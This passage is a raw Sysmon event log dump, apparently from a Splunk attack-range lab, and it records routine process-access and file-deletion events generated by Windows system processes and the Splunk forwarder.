Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F72B09746408EEB1BFF4E1F24ADB40B0,SHA256=6428D8591B8C043FBDF0344F3A186240E9CF97686F6C3E05C70B9637EE18D367,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217905Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:49.380{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-132D-6216-8E04-000000003902}224C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217904Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:49.380{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217903Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:49.380{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217902Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:49.380{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217901Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:49.380{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217900Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:49.380{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217899Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:49.380{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217898Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:49.380{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217897Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:49.380{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217896Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:49.380{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217895Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:49.380{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-132D-6216-8E04-000000003902}224C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217894Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:49.380{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-132D-6216-8E04-000000003902}224C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217893Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:49.381{4F8D34B0-132D-6216-8E04-000000003902}224C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000217923Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:50.599{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68F72217EC788F1F1631C23668647D65,SHA256=A13374E90B972AC840E22B2A62B5775438EAF58F5DBAD54CE1DB875D7F99CDAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293361Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:50.161{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B2427C686C0B315BECE22800FB8CB5E,SHA256=25F05CE6434044E0C41F3328FF0D5612A82F3A2DBBD93FD764B1B087233F9C67,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217922Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:50.412{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=999438516E89879AE67CF9D35CAC654F,SHA256=ABC57ECEB978938C1D8A13EAE0F85BAB57992032F27D7F271E649283B65F0183,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217921Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:50.130{4F8D34B0-132D-6216-8F04-000000003902}40323004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000217937Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:51.631{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61805BB7780F1F00E298FECE3AE96E8A,SHA256=E43B5601FCF96771BF7880CB4CAC5B72E11F29CAE59B48B2ACFC8A43962D2C46,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293362Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:51.223{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB0CC1DEFFF18C19C5E378C08592CAC4,SHA256=2C33026360BA1449ACE9FD72BA7B5DEB192AD7877F8A42ED309AB5077C4BA07A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217936Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:51.412{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-132F-6216-9004-000000003902}3060C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217935Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:51.412{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217934Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:51.412{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217933Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:51.412{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217932Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:51.412{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217931Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:51.412{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217930Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:51.412{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217929Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:51.412{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217928Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:51.412{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217927Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 